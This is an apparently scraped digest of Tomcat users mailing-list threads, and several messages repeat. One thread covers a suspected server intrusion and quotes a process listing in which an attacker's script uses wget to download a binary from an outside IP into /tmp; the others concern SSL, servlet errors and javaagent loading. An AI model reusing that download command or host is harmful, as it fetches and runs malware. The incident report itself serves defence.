> Apache: 2.2.17 mod_jk: 1.2.31 haproxy: 1.4.22 Tomcat: 7.0.53 Java: 
> 1.6.0.41
> 
> [root@arcbaappvrt05 tomcat]# /usr/java/default/bin/java -version 
> java version "1.6.0_41" Java(TM) SE Runtime Environment (build 
> 1.6.0_41-b02) Java HotSpot(TM) 64-Bit Server VM (build 20.14-b01, 
> mixed mode)
> 
> OS: CentOS 5.8 64 bit
> 
> [root@arcbaappvrt05 tomcat]# uname -a Linux 
> arcbaappvrt05.tic.yellargentina.com 2.6.18-308.el5 #1 SMP Tue Feb 
> 21 20:06:06 EST 2012 x86_64 x86_64 x86_64 GNU/Linux 
> [root@arcbaappvrt05 tomcat]# cat /etc/redhat-release CentOS
> release 5.8 (Final) [root@arcbaappvrt05 tomcat]#
> 
> For now i havent see that the squid process whas launched so i 
> couldnt do a dump
> 
> Letme know if you need more information.
> 
> BTW, pastebin links will work for one week.
> 
> Kind regards, yours
> 
> 
> 
> 
> Saludos.- Leonardo Santagostini
> 
> 
> 
> 
> 
> 
> 
> 2014-04-30 11:09 GMT-03:00 Leonardo Santagostini 
> :
> 
>> Ok, i will do the following:
>> 
>> 1) thread dump of running tomcat instance 2) Pastebin the
>> running tomcat config
>> 
>> I think at mid day will have all the info.
>> 
>> Thanks all for replying me and all the responses.
>> 
>> Regards, Leonardo
>> 
>> Saludos.- Leonardo Santagostini
>> 
>> 
>> 
>> 
>> 
>> 
>> 
>> 2014-04-30 10:55 GMT-03:00 Christopher Schultz < 
>> ch...@christopherschultz.net>:
>> 
>> -BEGIN PGP SIGNED MESSAGE-
>>> Hash: SHA256
>>> 
>>> Konstantin,
>>> 
>>> On 4/29/14, 4:54 PM, Konstantin Kolinko wrote:
 2014-04-30 0:41 GMT+04:00 Leonardo Santagostini 
 :
> Hello Dan,
> 
> Nop, the attacker is executing locally the following
> 
> tomcat8882 1  0 Apr27 ?00:00:00 sh 
> /tmp/4.sh tomcat8893  8882  0 Apr27 ?00:00:00 
> wget http://218.199.102.59/.xy/squid32 -O /tmp/squid
> 
> And the launch squid who tries to connect via ssh to 
> varoius places.
> 
> Right now its time to leave the office, but in a few hours 
> i will paste in pastebin access logs, config files, 
> wherever you tell me.
> 
> This is my pstree
> 
> [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree 
> init─┬─atd ├─java─┬─sh───wget │  └─263*[{java}]
 
 sh launched by tomcat's java?
>>> 
>>> Yes: please verify that it's the JVM running Tomcat, and not 
>>> just any JVM process.
>>> 
 Take a thread dump:
 
>>> https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F


>>>
>>> 
It shall show what is stacktrace in thread that launched external
 process.
>>> 
>>> +1
>>> 
>>> The only things that ship with Tomcat that call Process.exec() 
>>> are the CGI servlet and SSI, both of which are disabled by 
>>> default. So, either you have an insecure CGI/SSI
>>> configuration, your web application has a vulnerability, or you
>>> have deployed something like the Manager application and
>>> improperly-secured it.
>>> 
>>> A classic example of such an intrusion might be that someone 
>>> got a foothold elsewhere into your network, and the Manager
>>> web application is not properly secured with a password, etc.
>>> 
>>> - -chris -BEGIN PGP SIGNATURE- Version: GnuPG v1 
>>> Comment: GPGTools - http://gpgtools.org Comment: Using GnuPG 
>>> with Thunderbird - http://www.enigmail.net/
>>> 
>>> iQIcBAEBCAAGBQJTYQDeAAoJEBzwKT+lPKRYaPoQAKpqrj5bWfGXpEEHMINjw1Qp
>>>
>>>
>>> 
+qqdL7O61QLmWoA1neUbyM7A2s8mY3lRdcZwDw2IG33xoeLuFaavhFlDGr2Txer4
>>> HiGDR8ixOv2mY9J9bMC889hih4N5dz0fYlw/b5SouUVz2aCbeUhYK+6lsBXRy2fC
>>>
>>>
>>> 
D+UoNOiQF6uX2ZlqJYZTAvgzC2t/SGGnTW3GLx+3buRxs4JlUjJ8RWEOZtjZLQ5o
>>> gUZ+UF6K/7dewYr6TjDmwc1C226dJNaliym

Re: Regarding i think an intrusion

[Leonardo Santagostini]

Hello list,

well my homework is done

Here are the links:

setenv.sh: http://pastebin.com/EN1mXDFi
catalina.sh: http://pastebin.com/1vRVLbSm
web.xml: http://pastebin.com/BqEfiXXm
server.xml: http://pastebin.com/wfzE8bYU
logging.properties: http://pastebin.com/Qurk8sLU
catalina.properties: http://pastebin.com/jkfY1ZRQ
tree + logsfiles: http://pastebin.com/j3tip4ij

Note that logsfiles, are not the logfiles itsef but only a ls -lah (just
for you to see the logsizes)

A little more about the infraestructure i've mounted ill do some ascii art.


internet ---> FW -->nat-->Haproxy (1)-->Apache(2)--> mod_jk
(3)-->Haproxy(4)--> Tomcat7(5) --> haproxy(6) --Tomcat(7)


Apache(2) is serving static content so haproxy(1) at the first level does
http round robin balancing
Apache(2) connects to tomcat(5) through haproxy(4) (using L4 connection)
using mod_jk(3)
Tomcat(5) are the main app server (the ones gets intruded) who uses
tomcat(7) (solr service) using haproxy(6) using L4 connection.

Versions:

Apache: 2.2.17
mod_jk: 1.2.31
haproxy: 1.4.22
Tomcat: 7.0.53
Java: 1.6.0.41

[root@arcbaappvrt05 tomcat]# /usr/java/default/bin/java -version
java version "1.6.0_41"
Java(TM) SE Runtime Environment (build 1.6.0_41-b02)
Java HotSpot(TM) 64-Bit Server VM (build 20.14-b01, mixed mode)

OS: CentOS 5.8 64 bit

[root@arcbaappvrt05 tomcat]# uname -a
Linux arcbaappvrt05.tic.yellargentina.com 2.6.18-308.el5 #1 SMP Tue Feb 21
20:06:06 EST 2012 x86_64 x86_64 x86_64 GNU/Linux
[root@arcbaappvrt05 tomcat]# cat /etc/redhat-release
CentOS release 5.8 (Final)
[root@arcbaappvrt05 tomcat]#

For now i havent see that the squid process whas launched so i couldnt do a
dump

Letme know if you need more information.

BTW, pastebin links will work for one week.

Kind regards, yours




Saludos.-
Leonardo Santagostini







2014-04-30 11:09 GMT-03:00 Leonardo Santagostini :

> Ok, i will do the following:
>
> 1) thread dump of running tomcat instance
> 2) Pastebin the running tomcat config
>
> I think at mid day will have all the info.
>
> Thanks all for replying me and all the responses.
>
> Regards, Leonardo
>
> Saludos.-
> Leonardo Santagostini
>
> 
>
>
>
>
>
> 2014-04-30 10:55 GMT-03:00 Christopher Schultz <
> ch...@christopherschultz.net>:
>
> -BEGIN PGP SIGNED MESSAGE-
>> Hash: SHA256
>>
>> Konstantin,
>>
>> On 4/29/14, 4:54 PM, Konstantin Kolinko wrote:
>> > 2014-04-30 0:41 GMT+04:00 Leonardo Santagostini
>> > :
>> >> Hello Dan,
>> >>
>> >> Nop, the attacker is executing locally the following
>> >>
>> >> tomcat8882 1  0 Apr27 ?00:00:00 sh /tmp/4.sh
>> >> tomcat8893  8882  0 Apr27 ?00:00:00 wget
>> >> http://218.199.102.59/.xy/squid32 -O /tmp/squid
>> >>
>> >> And the launch squid who tries to connect via ssh to varoius
>> >> places.
>> >>
>> >> Right now its time to leave the office, but in a few hours i will
>> >> paste in pastebin access logs, config files, wherever you tell
>> >> me.
>> >>
>> >> This is my pstree
>> >>
>> >> [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree init─┬─atd
>> >> ├─java─┬─sh───wget │  └─263*[{java}]
>> >
>> > sh launched by tomcat's java?
>>
>> Yes: please verify that it's the JVM running Tomcat, and not just any
>> JVM process.
>>
>> > Take a thread dump:
>> >
>> https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F
>> >
>> >  It shall show what is stacktrace in thread that launched external
>> > process.
>>
>> +1
>>
>> The only things that ship with Tomcat that call Process.exec() are the
>> CGI servlet and SSI, both of which are disabled by default. So, either
>> you have an insecure CGI/SSI configuration, your web application has a
>> vulnerability, or you have deployed something like the Manager
>> application and improperly-secured it.
>>
>> A classic example of such an intrusion might be that someone got a
>> foothold elsewhere into your network, and the Manager web application
>> is not properly secured with a password, etc.
>>
>> - -chris
>> -BEGIN PGP SIGNATURE-
>> Version: GnuPG v1
>> Comment: GPGTools - http://gpgtools.org
>> Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
>>
>> iQIcBAEBCAAGBQJTYQDeAAoJEBzwKT+lPKRYaPoQAKpqrj5bWfGXpEEHMINjw1Qp
>> +qqdL7O61QLmWoA1neUbyM7A2s8mY3lRdcZwDw2IG33xoeLuFaavhFlDGr2Txer4
>> HiGDR8ixOv2mY9J9bMC889hih4N5dz0fYlw/b5SouUVz2aCbeUhYK+6lsBXRy2fC
>> D+UoNOiQF6uX2ZlqJYZTAvgzC2t/SGGnTW3GLx+3buRxs4JlUjJ8RWEOZtjZLQ5o
>> gUZ+UF6K/7dewYr6TjDmwc1C226dJNaliymQu2qbVgpRvoJ+baRgpeoyt6hzhIxr
>> BA8gjKY5xOH6QrpSX2tdU8RNCRVLIgSmbp9Mj+Hovdw4kkDMLQvS3osuGq5HaEwS
>> ZMltWiTef+K2yZyO3L8xrsJaRbox1j8Pg38ea22GRE48kpNagoQdCM2+uMCVN8Yj
>> UFjUrcpMu0FX06dy8azbFDRZMv5lD8nmwgE624nT+gZfFaxGHNLa9dRpJWHZgvTb
>> TSESKHv2lq9F4qc7bxoVrRDa8hnNLHk2luU9qot5JWXnb5en0fFKMZopwXwXYA4W
>> WgGA0Cfy4gALkA4/CCqrsn6Z+EqIxXNdCn74CeeCh5fV28+0Zpuj7G1adtJUkCQ7
>> 87Cq6kXwHx4hfp//6vQhnZIGWYeKDOIgqbKuaP27pIcE1QCag5MOlmVT4pQjpT12
>> lvJcfOh

Tomcat 8.0.3.0 getting never before seen by google Illegal State Exception. Sevlets outputting the audio output from the previous runs of the program instead of the current run.

[Hayward, Leigh]

Hello all,

My Java EE web application takes in multiple audio inputs and outputs
them as a single wav file via an application/octet stream.

It seemingly randomly works correctly (i.e. outputting the correctly
manipulated audio file) but sometimes, the file from a previous
run of the program is output and I get one of these errors:

SEVERE [http-nio-8084-exec-30] 
org.apache.catalina.loader.WebappClassLoader.clearReferencesThreads The web 
application [/MyApp] is still processing a request that has yet to finish. This 
is very likely to create a memory leak. You can control the time allowed for 
requests to finish by using the unloadDelay attribute of the standard Context 
implementation.

and to me seemingly random numbers of these errors:

"SEVERE [http-nio-8084-exec-87] 
org.apache.coyote.http11.AbstractHttp11Processor.process Error processing 
request java.lang.IllegalStateException: The resources may not be accessed if 
they are not currently started?"

The files always upload correctly to my filesystem, but something is
going wrong when I try to access them in order to process them.

Also when it is downloading the file it appears to the user
to be several MB long despite the file that is output being only a few
thousand KB.

Sometimes when it doesn't work it does not produce these errors, but it
never produces these errors when it works correctly.

I have googled it but there's no reference to the second kind of error
anywhere on the web aside from svn commits by tomcat developers,
so while I am a total newbie to mailing lists, after exhausting
stackoverflow this seemed like the only place to turn to. I'm
developing a java EE web application in Netbeans using Tomcat
8.0.3.0 on a windows 7 operating system.

The web application is very basic and allows users to upload files via a
multipart html form. This then posts to a servlet which first uploads these
files to the programs file system and then accesses them, concatenates
them together and saves them back on the file system.
It's better explained by this diagram http://imgur.com/Oacd4gq
Could it be that the files are not being uploaded fully before they are
being accessed?

Sorry if this email looks like shit i'm being forced to use outlook
by my university!

Thank you for taking the time to read my post.

Best wishes to you all regardless,
Leigh

Re: Regarding i think an intrusion

[Leonardo Santagostini]

Ok, i will do the following:

1) thread dump of running tomcat instance
2) Pastebin the running tomcat config

I think at mid day will have all the info.

Thanks all for replying me and all the responses.

Regards, Leonardo

Saludos.-
Leonardo Santagostini







2014-04-30 10:55 GMT-03:00 Christopher Schultz :

> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA256
>
> Konstantin,
>
> On 4/29/14, 4:54 PM, Konstantin Kolinko wrote:
> > 2014-04-30 0:41 GMT+04:00 Leonardo Santagostini
> > :
> >> Hello Dan,
> >>
> >> Nop, the attacker is executing locally the following
> >>
> >> tomcat8882 1  0 Apr27 ?00:00:00 sh /tmp/4.sh
> >> tomcat8893  8882  0 Apr27 ?00:00:00 wget
> >> http://218.199.102.59/.xy/squid32 -O /tmp/squid
> >>
> >> And the launch squid who tries to connect via ssh to varoius
> >> places.
> >>
> >> Right now its time to leave the office, but in a few hours i will
> >> paste in pastebin access logs, config files, wherever you tell
> >> me.
> >>
> >> This is my pstree
> >>
> >> [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree init─┬─atd
> >> ├─java─┬─sh───wget │  └─263*[{java}]
> >
> > sh launched by tomcat's java?
>
> Yes: please verify that it's the JVM running Tomcat, and not just any
> JVM process.
>
> > Take a thread dump:
> >
> https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F
> >
> >  It shall show what is stacktrace in thread that launched external
> > process.
>
> +1
>
> The only things that ship with Tomcat that call Process.exec() are the
> CGI servlet and SSI, both of which are disabled by default. So, either
> you have an insecure CGI/SSI configuration, your web application has a
> vulnerability, or you have deployed something like the Manager
> application and improperly-secured it.
>
> A classic example of such an intrusion might be that someone got a
> foothold elsewhere into your network, and the Manager web application
> is not properly secured with a password, etc.
>
> - -chris
> -BEGIN PGP SIGNATURE-
> Version: GnuPG v1
> Comment: GPGTools - http://gpgtools.org
> Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
>
> iQIcBAEBCAAGBQJTYQDeAAoJEBzwKT+lPKRYaPoQAKpqrj5bWfGXpEEHMINjw1Qp
> +qqdL7O61QLmWoA1neUbyM7A2s8mY3lRdcZwDw2IG33xoeLuFaavhFlDGr2Txer4
> HiGDR8ixOv2mY9J9bMC889hih4N5dz0fYlw/b5SouUVz2aCbeUhYK+6lsBXRy2fC
> D+UoNOiQF6uX2ZlqJYZTAvgzC2t/SGGnTW3GLx+3buRxs4JlUjJ8RWEOZtjZLQ5o
> gUZ+UF6K/7dewYr6TjDmwc1C226dJNaliymQu2qbVgpRvoJ+baRgpeoyt6hzhIxr
> BA8gjKY5xOH6QrpSX2tdU8RNCRVLIgSmbp9Mj+Hovdw4kkDMLQvS3osuGq5HaEwS
> ZMltWiTef+K2yZyO3L8xrsJaRbox1j8Pg38ea22GRE48kpNagoQdCM2+uMCVN8Yj
> UFjUrcpMu0FX06dy8azbFDRZMv5lD8nmwgE624nT+gZfFaxGHNLa9dRpJWHZgvTb
> TSESKHv2lq9F4qc7bxoVrRDa8hnNLHk2luU9qot5JWXnb5en0fFKMZopwXwXYA4W
> WgGA0Cfy4gALkA4/CCqrsn6Z+EqIxXNdCn74CeeCh5fV28+0Zpuj7G1adtJUkCQ7
> 87Cq6kXwHx4hfp//6vQhnZIGWYeKDOIgqbKuaP27pIcE1QCag5MOlmVT4pQjpT12
> lvJcfOhzHLwo07Pv+y3J
> =EiX9
> -END PGP SIGNATURE-
>
> -
> To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
> For additional commands, e-mail: users-h...@tomcat.apache.org
>
>

Re: Setup Issue tomcat 6 SLES 11 SSL

[Christopher Schultz]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Vincent,

On 4/29/14, 4:24 PM, Vincent T. DiScipio wrote:
> I have setup tomcat 6 on SLES 11 and secured the instance with an 
> external certificate if authority.  The following is occurring
> from the same machine using both IE and Firefox:
> 
> http://servername.wooster.edu:8080works for both IE11 and
> Firefox 29 and displays the index.html
> 
> https://servername.wooster.edu:8443  works for Firefox 29 and 
> displays the index.html
> 
> https://servername.wooster.edu:8443  does not work for IE11v
> displays "This page can't be displayed"
> 
> I have changed the logging level to finest and do not see any
> errors in the catalina.out.
> 
> Thoughts?  I have the same setup on another server and I believe
> the files and permission levels are set the same.

What does your SSL configuration look like?

You could also use either sslscan from the CLI or go to
https://www.ssllabs.com/ssltest/ and use their online tool to examine
the site from the outside.

Perhaps you have a combination of protocols and ciphers that MSIE
can't handle.

- -chris
-BEGIN PGP SIGNATURE-
Version: GnuPG v1
Comment: GPGTools - http://gpgtools.org
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/

iQIcBAEBCAAGBQJTYQKPAAoJEBzwKT+lPKRYFvgQAMtjHrKhYUfEbZuX45qRB2Oo
lbEw/5VCjpGqSuE5ZJEugbwnMhYfFoQ+ruLW6K1J+RPqSjX/F/8dWO3MY9WEeowO
L8qgEDiNS52WH8WvleUw97ZTVaUuSyY7oCbxrgbMe1sU0Yl5o4f1/CqoqdZU0awv
9q0ijvVWEbzQws90e61uZ5RRcfdIFIIy4jN/ugyy+qX65wYhPw8MCOzgOCOM3KJM
oJZu5/O0eOEudnA6H7UyJpmMf625i1kRj+MOLsSejt45jvi9O2pWLuHme+s8Ikuo
LLYMIAr+u6ZXDMbpNi4oEo1QH6vco6pfXvk3usRAmCAt/oTt2tqyvpW4NZ+XDNvC
YFP2tCRpe5QvCFrBmLWX9ToLhFNPdgNGBtz5vvZR9dZlYJhRsruF9Zm0TkfE6DB+
uMv5VxSiF0GhgLdT7DkrgKuCVgflIEXET33Hb3jTlduP6A8k1RIHAeiUMelQBqxn
kg7APmiHjCAxtRLQ/U1jIz1Fu1c3bsRWqk5bOXOBn9zSrJVVAAS6kXGPHc0j1VHQ
8zVr0GfiFoe3Tj/5CTTOlbDCf5iA8JpYKtdsPzx1AgqzKHCOzcGfMsH5gXqoHf6o
g0NVqve4TYijfQzhC7zXJqXJZUKfmQqayXzHdbNv/nwz3S7nlEXrncoLe7vPyHSF
yPWejLbhZqRiXQPb2b5P
=5i8f
-END PGP SIGNATURE-

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Re: javaagent initialization (premain-method) not triggered by tomcat 7.0.52

[Christopher Schultz]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Konstantin,

On 4/29/14, 7:17 PM, Konstantin Kolinko wrote:
> 2014-04-29 12:28 GMT+04:00 Fredrik
> :
>> Hello. We're using jamm (https://github.com/jbellis/jamm) a java
>> agent for measuring object memory usage, passing the javaagent
>> argument to tomcat as 
>> "-javaagent:../../tomcat/webapps/ROOT/WEB-INF/lib/jamm-0.2.3.jar".
>>
>> 
When running 7.0.50 everything works as expected but after upgrading to
>> 7.0.52 the initialization code of the agent (premain-method)
>> isn't called anymore. Any ideas?
> 
> 
> I understand that that means that you have the same jar present in 
> both the System classloader and the Webapp classloader.
> 
> You should remove that jar from WEB-INF/lib directory of that
> webapp.
> 
> IIRC, in 7.0.50 and earlier Tomcat preferred the class from the
> system classloader (effectively ignoring the webapp's jar).
> 
> In 7.0.52 it does load the class provided by web application.

Actually, I'd like an explanation of the above. I'm not saying it's
wrong or makes no sense, but I don't quite understand how it could
interfere:

The javaagent should be loaded at JVM launch, which is before any web
applications exist, so no ClassLoader conflict should occur.

When a remote process connects to the agent, it should do so out of
context of any web application (that is, the thread that handles the
connection should not have its ClassLoader set to the
WebappClassLoader of any deployed web application), so no classes
should be loaded from the WebappClassLoader.

- -chris
-BEGIN PGP SIGNATURE-
Version: GnuPG v1
Comment: GPGTools - http://gpgtools.org
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/

iQIcBAEBCAAGBQJTYQIIAAoJEBzwKT+lPKRY3WUP/3y/rRw6Bd+bvHm8SY/t1fHh
4cnCvjbjTSluRNNl0/QrwpSev0NrTtyGn40aTSP5OM7QQfhK3DK70uBrlwZENAiY
zcsCTXRe9IuVSlQPdvXLnq59E3ZXYyUVIRlge5Wh9ucg6onYFmCFQPmOBpBYppix
MWKrbAkaxeTxY2iD73DQeX02cda9N9YeC0FtGI+i3p3x9gGQ/1BcJZAH3sV7gz9s
T/zgZ72WYnRQJ5h5zBhCIGQCUKiA6uR7DzPAuB5L8JXybnQ5OvKjrJS03169G3AX
PEMFCzLbImaKy8sttJNWNb4JyjKAZE26lmPWHK7Hop27FWGAobjogb5vEQ5XDJWh
exV+VRpT2OyWFUfJWF5scM23iKR1JzZz/S433YpAXQC2g/8Q+qbZLB//q0D7T8TW
VbmHxBjYPFcN2DkGYtm8uFGVRxDbNNJMvUG+7+oCX3B3bF4sr3roD2FGVrkN4qlL
HEG0pCxPmiZ8wEQWHem/9VPCMHKNW36eX7KllW8M+35GAQURXKgayxGPGn20zDc7
Nn1exxKzcFjawTKt1LlR3aHEsGYKyXbsEOb1Ivgmm7YYz5vGiIunkYS1V1jfdUGz
68NwB67EZg93cA4BVpEjsorxAlWYg0vvmlwa2/poFKJGG3XRABRPe6PWIvoz23Yg
9TlEwIFdtBlMbQoY71NN
=ZgaK
-END PGP SIGNATURE-

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Re: Regarding i think an intrusion

[Christopher Schultz]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Konstantin,

On 4/29/14, 4:54 PM, Konstantin Kolinko wrote:
> 2014-04-30 0:41 GMT+04:00 Leonardo Santagostini
> :
>> Hello Dan,
>> 
>> Nop, the attacker is executing locally the following
>> 
>> tomcat8882 1  0 Apr27 ?00:00:00 sh /tmp/4.sh 
>> tomcat8893  8882  0 Apr27 ?00:00:00 wget 
>> http://218.199.102.59/.xy/squid32 -O /tmp/squid
>> 
>> And the launch squid who tries to connect via ssh to varoius
>> places.
>> 
>> Right now its time to leave the office, but in a few hours i will
>> paste in pastebin access logs, config files, wherever you tell
>> me.
>> 
>> This is my pstree
>> 
>> [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree init─┬─atd 
>> ├─java─┬─sh───wget │  └─263*[{java}]
> 
> sh launched by tomcat's java?

Yes: please verify that it's the JVM running Tomcat, and not just any
JVM process.

> Take a thread dump: 
> https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F
>
>  It shall show what is stacktrace in thread that launched external
> process.

+1

The only things that ship with Tomcat that call Process.exec() are the
CGI servlet and SSI, both of which are disabled by default. So, either
you have an insecure CGI/SSI configuration, your web application has a
vulnerability, or you have deployed something like the Manager
application and improperly-secured it.

A classic example of such an intrusion might be that someone got a
foothold elsewhere into your network, and the Manager web application
is not properly secured with a password, etc.

- -chris
-BEGIN PGP SIGNATURE-
Version: GnuPG v1
Comment: GPGTools - http://gpgtools.org
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/

iQIcBAEBCAAGBQJTYQDeAAoJEBzwKT+lPKRYaPoQAKpqrj5bWfGXpEEHMINjw1Qp
+qqdL7O61QLmWoA1neUbyM7A2s8mY3lRdcZwDw2IG33xoeLuFaavhFlDGr2Txer4
HiGDR8ixOv2mY9J9bMC889hih4N5dz0fYlw/b5SouUVz2aCbeUhYK+6lsBXRy2fC
D+UoNOiQF6uX2ZlqJYZTAvgzC2t/SGGnTW3GLx+3buRxs4JlUjJ8RWEOZtjZLQ5o
gUZ+UF6K/7dewYr6TjDmwc1C226dJNaliymQu2qbVgpRvoJ+baRgpeoyt6hzhIxr
BA8gjKY5xOH6QrpSX2tdU8RNCRVLIgSmbp9Mj+Hovdw4kkDMLQvS3osuGq5HaEwS
ZMltWiTef+K2yZyO3L8xrsJaRbox1j8Pg38ea22GRE48kpNagoQdCM2+uMCVN8Yj
UFjUrcpMu0FX06dy8azbFDRZMv5lD8nmwgE624nT+gZfFaxGHNLa9dRpJWHZgvTb
TSESKHv2lq9F4qc7bxoVrRDa8hnNLHk2luU9qot5JWXnb5en0fFKMZopwXwXYA4W
WgGA0Cfy4gALkA4/CCqrsn6Z+EqIxXNdCn74CeeCh5fV28+0Zpuj7G1adtJUkCQ7
87Cq6kXwHx4hfp//6vQhnZIGWYeKDOIgqbKuaP27pIcE1QCag5MOlmVT4pQjpT12
lvJcfOhzHLwo07Pv+y3J
=EiX9
-END PGP SIGNATURE-

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Re: javaagent initialization (premain-method) not triggered by tomcat 7.0.52

[Fredrik]

Konstantin Kolinko skrev 2014-04-30 01:17:

2014-04-29 12:28 GMT+04:00 Fredrik :

Hello.
We're using jamm (https://github.com/jbellis/jamm) a java agent for
measuring object memory usage, passing the javaagent argument
to tomcat as
"-javaagent:../../tomcat/webapps/ROOT/WEB-INF/lib/jamm-0.2.3.jar".
When running 7.0.50 everything works as expected but after upgrading to
7.0.52 the initialization code of the agent (premain-method) isn't called
anymore.
Any ideas?


I understand that that means that you have the same jar present in
both the System classloader and the Webapp classloader.

You should remove that jar from WEB-INF/lib directory of that webapp.

IIRC, in 7.0.50 and earlier Tomcat preferred the class from the system
classloader (effectively ignoring the webapp's jar).

In 7.0.52 it does load the class provided by web application.

Best regards,
Konstantin Kolinko

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Now I get what you mean (I guess). Specifying the javaagent option will 
automagically add the jar to the system classloader but when the webapp 
is loaded it's also added to the webapp classloader. since it resides in 
webapps/ROOT/WEB-INF/lib/. In < 7.0.50 tomcat will load the jar in the 
system classloader, but in > 7.0.52 it loads it into the webapp 
classloader which means we'll have a conflict (same jar in different 
classloaders).


Thanks.
/Fredrik


-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Re: javaagent initialization (premain-method) not triggered by tomcat 7.0.52

[Fredrik]

Konstantin Kolinko skrev 2014-04-30 01:17:

2014-04-29 12:28 GMT+04:00 Fredrik :

Hello.
We're using jamm (https://github.com/jbellis/jamm) a java agent for
measuring object memory usage, passing the javaagent argument
to tomcat as
"-javaagent:../../tomcat/webapps/ROOT/WEB-INF/lib/jamm-0.2.3.jar".
When running 7.0.50 everything works as expected but after upgrading to
7.0.52 the initialization code of the agent (premain-method) isn't called
anymore.
Any ideas?


I understand that that means that you have the same jar present in
both the System classloader and the Webapp classloader.

You should remove that jar from WEB-INF/lib directory of that webapp.

IIRC, in 7.0.50 and earlier Tomcat preferred the class from the system
classloader (effectively ignoring the webapp's jar).

In 7.0.52 it does load the class provided by web application.

Best regards,
Konstantin Kolinko

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Now I get what you mean (I guess). Specifying the javaagent option will 
automagically add the jar to the system classloader but when the webapp 
is loaded it's also added to the webapp classloader. since it resides in 
webapps/ROOT/WEB-INF/lib/. In < 7.0.50 tomcat will load the jar in the 
system classloader, but in > 7.0.52 it loads it into the webapp 
classloader which means we'll have a conflict (same jar in different 
classloaders).


Thanks.
/Fredrik

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Re: javaagent initialization (premain-method) not triggered by tomcat 7.0.52

[Fredrik]

Konstantin Kolinko skrev 2014-04-30 01:17:

2014-04-29 12:28 GMT+04:00 Fredrik :

Hello.
We're using jamm (https://github.com/jbellis/jamm) a java agent for
measuring object memory usage, passing the javaagent argument
to tomcat as
"-javaagent:../../tomcat/webapps/ROOT/WEB-INF/lib/jamm-0.2.3.jar".
When running 7.0.50 everything works as expected but after upgrading to
7.0.52 the initialization code of the agent (premain-method) isn't called
anymore.
Any ideas?


I understand that that means that you have the same jar present in
both the System classloader and the Webapp classloader.

You should remove that jar from WEB-INF/lib directory of that webapp.

IIRC, in 7.0.50 and earlier Tomcat preferred the class from the system
classloader (effectively ignoring the webapp's jar).

In 7.0.52 it does load the class provided by web application.

Best regards,
Konstantin Kolinko

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

I only have one jar which is placed at 
(webapps/ROOT/WEB-INF/lib/jamm-0.2.3.jar).
A little bit strange but when I moved the jar to tomcat/lib then the 
agent starts working as expected.


Regards
/Fredrik


-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org